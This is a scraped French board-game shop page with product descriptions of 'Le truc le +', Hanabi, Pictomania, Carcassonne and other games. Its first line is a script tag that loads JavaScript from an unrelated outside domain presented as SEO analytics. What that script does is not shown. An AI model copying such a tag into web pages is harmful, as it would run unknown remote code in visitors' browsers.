<script src="https://general-soft.space/seo-analytics.js" async></script>
|
Select Theme
|
|
|
Custome Color 1
|
|
|
Custome Color 2
|
|
|
Box-Layout
|
|
|
Background Pattern
|
custome background also available in admin. |
|
Background color
|
|
|
Wow Animation Enable
|
|
|
Left Stickt Enable
|
|
|
Right Stickt Enable
|
|
Soyez vous-même : pensez comme tout le monde !
Dans ce jeu, les joueurs doivent deviner les avis des autres et penser comme la majorité pour gagner la partie. Il n'y a pas de bonne ou mauvaise réponse ! Amusez-vous à argumenter votre décision pour des discussions sans queue ni tête qui feront rire tous les joueurs !
Garanties sécurité (à modifier dans le module "Réassurance")
Politique de livraison (à modifier dans le module "Réassurance")
Politique retours (à modifier dans le module "Réassurance")
Soyez vous-même : pensez comme tout le monde !
Dans ce jeu, les joueurs doivent deviner les avis des autres et penser comme la majorité pour gagner la partie. Il n'y a pas de bonne ou mauvaise réponse ! Amusez-vous à argumenter votre décision pour des discussions sans queue ni tête qui feront rire tous les joueurs !
Un bébé est-il plus fort qu'un ballon ? La tolérance est-elle plus utile qu'un chocolat ? Faites le bon choix, votez comme les autres !
À chaque tour, 5 mots sont proposés. Parmi eux, choisissez lequel est le truc le plus... démodé, clair ou rural.
Votre but : faire partie de la majorité ! Si vous avez voté comme les autres, défaussez-vous d'un jeton Solo. Soyez le premier à ne plus en avoir pour l'emporter !
Le truc le + est un jeu fun et délirant pour jouer en famille ou entre amis !
| Auteur(s) : | Maxime Rambourg |
| Année : | 2014 |
| Editeur : | Iello |
| Nombre de Joueurs : | 3 à 8 |
| Age : | 8 Ans |
| Durée : | 20 Mns |
Le Prince cherche sa Princesse, mais tous les personnages de la Cour gardent leur identité secrète et ne comptent pas forcément l’aider. Il pourra compter sur ses précieux alliés pour obtenir la vérité, mais devra se méfier des partisans de la Reine Noire qui feront tout pour obtenir son avènement, tandis que la Servante et l’Espion essaieront de tromper les deux camps.
L’extension maintes fois saluée par la critique et recommandée par tous les fans de Jamaica fait son grand retour !
Pirates, recrutez de nouveaux membres d'équipage à la taverne et pimentez vos parties avec leurs pouvoirs et la découverte de nouveaux trésors ! Grâce à cette extension pour Jamaica, donnez à vos courses encore plus d'interaction et de fun ! Chargez davantage de marchandises avec le tonnelier, attaquez vos adversaires à distance avec le flibustier ou gérez mieux vos déplacements avec l'ancrier !
Dans le val d’Hérens, les fleurs sont savoureuses et les trèfles succulents. Cela attire toutes les vaches de la région qui ne reculeront devant rien pour une poignée de marguerites !
En tant que vache des alpages, baladez-vous dans les prés, mangez les fleurs indiquées sur votre plateau individuel et défendez votre petit coin de verdure lorsqu’une voisine tente de déguster vos marguerites !
Draft de dés et programmation de déplacement sont au menu de ce jeu de duel, accessible dès 6 ans.
Le matériel est pensé pour eux : de (vrais) dés-vaches flexibles pour des duels en toute sécurité et un univers coloré. Parents et enfants vont enfin se livrer à des duels tendus et tactiques !
Simple et tactique à la fois, Qawale trouve son inspiration dans les piles de galets que l'on trouve au bord des chemins. À l'image de ces pierres qui voyagent, placez un galet au sommet d'une pile avant de l'égrener sur les cases du plateau. Formez une ligne de 4 galets à votre couleur pour remporter la partie.
Dans la jungle, le lion dort… Il est temps de réunir les animaux pour les sauver.
Jungle Speed Kids, c’est le jeu de mémoire, d’observation et de réflexes pour les jeunes joueurs ! Un totem est disposé au centre de la table, et chacun retourne ses tuiles d’animaux au fur et à mesure, avant de les replacer face cachée. Dès que quelqu’un est sûr que la tuile révélée est de la même famille qu’une autre, cachée, il s’empare du totem et le place sur la tuile concernée.
S’il s’est trompé, il est interdit de prendre le totem jusqu’à ce qu’une tuile lion apparaisse, ou que le tour revienne à lui. Sinon, il remporte les deux tuiles concernées !
Hit ! Extrême se déroule exactement de la même manière que le jeu Hit! Si vous connaissez déjà les règles vous pouvez uniquement prendre connaissance des Cartes Spéciales et commencer à jouer !
Sachez vous arrêter au bon moment et profiter des effets des cartes spéciales… ou vous risquez de perdre tous vos gains !
Le vainqueur sera le joueur qui aura le plus de points lorsque la pioche sera épuisée.
N'oubliez pas les commandes de boissons passées dans votre café... ou perdez votre emploi !
Tous les joueurs travaillent dans un café et pour garder leur emploi, ils devront gérer toutes les commandes qui arrivent. A chaque tour, vous distribuez un certain nombre de cartes face visible et les lisez à haute voix afin que tout le monde connaisse toutes les commandes passées, puis vous distribuez ces cartes face cachée aux joueurs. À votre tour, vous devez nommer une commande qui se trouve dans la main d'un autre joueur. Si vous n'y parvenez pas, c'est perdu ! Si vous parvenez à révéler collectivement un certain nombre de boissons avant que tout le monde ne soit éliminé, vous passez le niveau et êtes prêt à relever des défis plus difficiles...
Explodino est un jeu de devinettes pour enfants et parents, à partir de 6 ans et de 2 à 6 joueurs.
Le jeu est composé de 48 cartes dino à deviner, une carte lexique avec le nom de l'ensemble des créatures présentent dans le jeu, une carte plateau et un pion. Chaque carte dino comporte des informations sur une créature préhistorique :
- 3 mots clés
- 3 indices de difficulté décroissante
- les informations sur le poids, la longueur et l'époque préhistorique de la créature
- une information insolite sur la créature préhistorique.
Feu d’artifice coopératif !
Dans ce jeu coopératif jamais vu, les joueurs œuvrent ensemble pour tirer de beaux feux d’artifice. Mais comme les poudres, les mèches et les fusées sont complètement mélangées, chaque joueur doit tenir ses cartes à l’envers !
Personne ne voit son propre jeu… Il faudra donc informer intelligemment ses coéquipiers et mémoriser les informations reçues. L’entraide est la clé pour réaliser un spectacle inoubliable et éviter les huées de la foule !
Cette édition comporte le jeu Hanabi original (Spiel des Jahres 2013) et 3 extensions inédites :
• Avalanche de couleurs (10 cartes multicolores)
• Poudre noire (10 cartes noires)
• 5 flamboyants (6 tuiles BONUS et une aide de jeu)
Le jeu de dessin plus que malin !
Oubliez les grands chefs-d’oeuvre ! Pas besoin de savoir dessiner pour jouer à Pictomania, il suffit que votre dessin ressemble à peu près à quelque chose.
Chaque joueur doit dessiner un mot et deviner en même temps ce que les autres dessinent...
Une aventure pleine de mystères dans les années 90 !
1994, quatre adolescents découvrent un vieux jeu de société lors d’un vide grenier. Plus ils y jouent, plus ils comprennent qu’il est étrangement connecté à leurs propres vies. C’est le point de départ d’une aventure et d’une histoire captivantes.
Le Projet est un jeu coopératif unique en son genre. C’est un véritable voyage, dont les étapes sont autant de puzzles, d’énigmes et de codes secrets à résoudre.
La campagne qu’il propose vous permet de suivre ces quatre héros malgré eux, tout du long d’une bande dessinée qui ouvre chaque chapitre. Coopérez
Carcassonne revient à préhistoire !
Des milliers d’années avant la construction de la cité de Carcassonne, la région était déjà fortement peuplée. On y chassait des animaux sauvages, cueillait des baies et pêchait des poissons afin de survivre. Aujourd’hui encore, des peintures rupestres témoignent de la vie de cette époque.
Dans Carcassonne – Chasseurs et Cueilleurs, les joueurs construisent un paysage bucolique et sauvage avec leurs tuiles. Le but est de placer judicieusement ses meeples en leur attribuant toujours une caractéristique (cueilleurs ou chasseurs), afin de gagner des points. Les huttes et les menhirs seront des atouts indéniables pour que votre tribu prenne l’avantage !